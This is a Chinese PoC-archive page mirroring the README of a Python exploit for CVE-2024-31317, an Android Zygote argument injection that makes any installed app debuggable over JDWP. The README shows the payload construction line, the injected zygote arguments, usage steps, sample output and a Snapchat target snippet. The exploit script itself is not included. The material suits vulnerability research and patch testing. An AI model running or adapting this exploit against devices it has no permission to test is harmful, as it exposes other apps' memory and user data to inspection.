支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:752

75.2%
立即捐款

POC详情: 8f07532b9ffe460a08a648369e89a76ca161df44

来源
https://github.com/CleoV2/Debuggable-App-Exploit
关联漏洞
标题:Google Android 安全漏洞 (CVE-2024-31317)
描述:Google Android是美国谷歌(Google)公司的一套以Linux为基础的开源操作系统。 Google Android 存在安全漏洞,该漏洞源于 ZygoteProcess.java 文件的 multiple 方法存在不安全的反序列化,有可能通过 WRITE_SECURE_SETTINGS 以任何应用程序的身份实现代码执行。
描述
CVE-2024-31317 Debuggable App Exploit
介绍
# CVE-2024-31317 Debuggable App Exploit

A Python-based exploit for CVE-2024-31317 (Android Zygote Injection) that makes any installed Android app debuggable by injecting malicious zygote arguments through the `hidden_api_blacklist_exemptions` setting.

## Overview

This exploit leverages a command injection vulnerability in Android's Zygote process to start target applications with the `debuggable` flag enabled. This allows JDWP debugging and inspection of any app without needing root access or the app's debug version.

**Based on the research from:** [Flanker's CVE-2024-31317 Analysis](https://blog.flanker017.me/cve-2024-31317/)

Key insight: *"the runtime-flags field in ZygoteArguments can actually be used to enable an application's debuggable attribute."*

## Features

- **Auto-detection mode** - Automatically detects target app's UID, instruction set, and data directory
- **Debuggable flag injection** - Sets `runtime-flags=65535` to enable debugging
- **JDWP forwarding** - Automatically sets up JDWP port forwarding after exploit
- **Logcat monitoring** - Shows app logs after successful exploitation
- **Clean startup** - Ensures debug app is fully closed before starting
- **Auto-install debug app** - Installs helper app if not present

## Requirements

- Android device vulnerable to CVE-2024-31317 (pre-June 2024 security patch)
- ADB installed and USB debugging enabled
- Python 3.10+

## Installation

Place the following files in the same directory:
- `CVE-2024-31317-Debuggable.py` (main exploit)
- `jdwplib.py` (JDWP client library)
- `app-debug.apk` (debuggable helper app)
- `win32/adb.exe` (Windows) or ensure `adb` is in PATH

## Usage

### Basic Usage

```bash
python CVE-2024-31317-Debuggable.py
```

The script will prompt you to select a configuration mode:

```
Configuration Mode:
  [1] Auto-detect app parameters (UID, instruction-set, data-dir)
  [2] Use hardcoded values (faster, less reliable)

Select mode (1/2) [default: 1]:
```

### What it does

1. **Phase 1: Extract startSeq**
   - Starts a debuggable helper app (F-Droid or custom debug app)
   - Connects via JDWP and extracts the `startSeq` value from stack frames
   - Closes the helper app

2. **Phase 2: Inject Zygote Arguments**
   - Builds malicious zygote arguments with `runtime-flags=65535` (debuggable)
   - Injects payload into `hidden_api_blacklist_exemptions` setting
   - Force-stops and restarts target app with injected arguments

3. **Post-Exploitation**
   - Shows logcat entries for target app
   - Sets up JDWP port forwarding
   - Provides local port for debugger connection

### Example Output

```
[INFO] ======================================================================
[INFO] CVE-2024-31317 Debuggable App Exploit
[INFO] ======================================================================
[INFO] Using auto-detect mode
[INFO] Closing debug app
[INFO] App com.debug.app is already installed
[INFO] Phase 1: Starting debug application to extract startSeq
[INFO] Process started with PID: 12345
[INFO] JDWP forwarded to local port: 8700
[INFO] Found main thread
[INFO] Found startSeq in frame 5
[INFO] startSeq value: 123456
[INFO] Closing debug app
[INFO] Phase 2: Exploiting com.snapchat.android
[INFO] Auto-detecting parameters for com.snapchat.android
[INFO] Detected UID/GID: 10242
[INFO] Detected instruction set: arm64
[INFO] Detected data directory: /data/user/0/com.snapchat.android
[INFO] Payload size: 8765 bytes
[INFO] Exploit completed successfully
[INFO] Target app PID: 23456
[INFO] JDWP forwarded to local port: 8701
[INFO] You can now connect a JDWP debugger to port 8701
```

## Configuration

### Target App

Edit the `main()` function to change the target app:

```python
target_app = "com.snapchat.android"  # Change to your target package
debug_app = "com.debug.app"          # Helper debuggable app
debug_apk = "app-debug.apk"          # APK file for helper app
```

### Auto-detect vs Hardcoded

**Auto-detect mode (recommended):**
- Uses `pm list packages -U` to get UID
- Uses `dumpsys package` to get instruction set and data directory
- More reliable across different devices

**Hardcoded mode:**
- Uses default values (UID=10242, arm64, etc.)
- Faster but if you have original zygote args its more stable

## After Exploitation

Once the exploit succeeds, the target app is running with debugging enabled. You can:

1. **Connect with JDWP debugger:**
   ```bash
   jdb -attach localhost:8701
   ```
2. **Use Android Studio debugger** - attach to process on the forwarded port
3. **Use Frida** (if gadget is injected via jdwp script)

## Files

- `CVE-2024-31317-Debuggable.py` - Main exploit script
- `jdwplib.py` - Java Debug Wire Protocol client library
- `app-debug.apk` - Minimal debuggable helper app

## How It Works

### Vulnerability Overview

CVE-2024-31317 is a command injection vulnerability in Android's Zygote process. By manipulating the `hidden_api_blacklist_exemptions` system setting with specially crafted input, we can inject arbitrary zygote arguments when an app starts.

### Key Components

1. **startSeq Extraction**: Every app launch has a unique sequence number. We extract this from a debuggable app via JDWP.

2. **Payload Construction**: We build zygote arguments including:
   ```
   --runtime-flags=65535  # Enables all debug flags including debuggable
   --setuid=<target_uid>
   --package-name=<target_app>
   seq=<startSeq+1>
   ```

3. **Injection**: Payload is injected into the system setting with specific padding for Android 12+:
   ```python
   payload = "\n" * 3000 + "A" * 5157 + zygote_arguments + "," + ",\n" * 1400
   ```

4. **Trigger**: Force-stop and restart the target app, which launches with our injected arguments.

## Limitations
- Only works on devices vulnerable to CVE-2024-31317 (pre-June 2024)
- Not a root exploit - only provides debuggable access

## Credits

- **[Flanker (flanker017)](https://blog.flanker017.me/)** - Original research and writeup on CVE-2024-31317
- **typlo** - Code snippets for finding startSeq via JDWP
- **[Anonymous941](https://github.com/Anonymous941/zygote-injection-toolkit)** - Zygote injection toolkit reference
- **Meta X Red Team** - Original vulnerability disclosure

## References

- [CVE-2024-31317 Detailed Analysis](https://blog.flanker017.me/cve-2024-31317/)
- [Meta Security Advisory](https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html)
- [InfoSec Writeup](https://infosecwriteups.com/exploiting-android-zygote-injection-cve-2024-31317-d83f69265088)
- [Anonymous941's Toolkit](https://github.com/Anonymous941/zygote-injection-toolkit)

## Disclaimer

This tool is for educational and research purposes only. Only use this on devices you own or have explicit permission to test. Unauthorized access to computer systems is illegal.

## License

MIT License - See LICENSE file for details
文件快照

 [4.0K]  /data/pocs/8f07532b9ffe460a08a648369e89a76ca161df44
├── [9.0M]  app-debug.apk
├── [ 18K]  CVE-2024-31317-Debuggable.py
├── [ 24K]  jdwplib.py
├── [6.9K]  README.md
└── [4.0K]  win32
    ├── [5.7M]  adb.exe
    ├── [ 96K]  AdbWinApi.dll
    └── [ 62K]  AdbWinUsbApi.dll

2 directories, 7 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。